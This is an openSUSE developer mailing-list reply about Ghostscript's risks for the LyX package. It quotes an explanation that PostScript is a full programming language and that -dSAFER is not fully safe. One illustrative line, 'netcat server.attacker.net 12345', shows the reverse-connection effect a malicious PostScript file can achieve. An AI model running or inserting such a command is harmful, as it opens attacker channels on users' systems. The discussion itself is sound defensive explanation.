Op 04-07-19 om 16:07 schreef Johannes Meixner:
YI:
For some background information about the root cause behind all those PostScript/Ghostscript related security issues see the section "It is crucial to limit access to CUPS to trusted users" in https://en.opensuse.org/SDB:CUPS_and_SANE_Firewall_settings that reads (excerpts): ------------------------------------------------------------------- PostScript but also PDF to some extent ... is actually a program. ... PostScript is a general purpose Turing-complete programming language (cf. https://en.wikipedia.org/wiki/PostScript) that supports in particular file access on the system disk. When Ghostscript processes PostScript it runs a PostScript program as the user who runs Ghostscript ... When Ghostscript processes an arbitrary PostScript file, the user who runs Ghostscript runs an arbitrary program which can do anything on the system where Ghostscript runs that this user is allowed to do on that system. To make it safer when Ghostscript runs a PostScript program the Ghostscript command line option '-dSAFER' disables certain file access functionality (for details see /usr/share/doc/ghostscript/*/Use.htm). ... Its name 'SAFER' says everything: It makes it 'safer' to let Ghostscript run a PostScript program, but it does not make it completely safe. -------------------------------------------------------------------
Simply put:
Via some special (but well known) indirections in Ghostscript a PostScript program or an Encapsulated PostScript [EPS] program that a user runs via Ghostscript could execute certain stuff which results basically the equivalent of things like
netcat server.attacker.net 12345
when an innocent user only liked to view the graphical output of a malicious PostScript program or convert it into another (graphical) data type.
Cf. http://bugzilla.opensuse.org/show_bug.cgi?id=1134327#c13
In the end it means:
By default it must not be allowd to let Ghostscript (or any other PostScript interpreter) run arbitrary PostScript programs from (possibly) untrusted origin.
Thanks for the information. Thanks all for input. My proposal was not met with enthusiasm, so that is a no-go. I have added a README.SUSE with all information and options the user has. In the description field I refer to this. It is in Publishing/lyx, for those who would like to give feedback. I will submit it later to factory. Kind Regards, Cor -- To unsubscribe, e-mail: opensuse-factory+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse-factory+owner@opensuse.org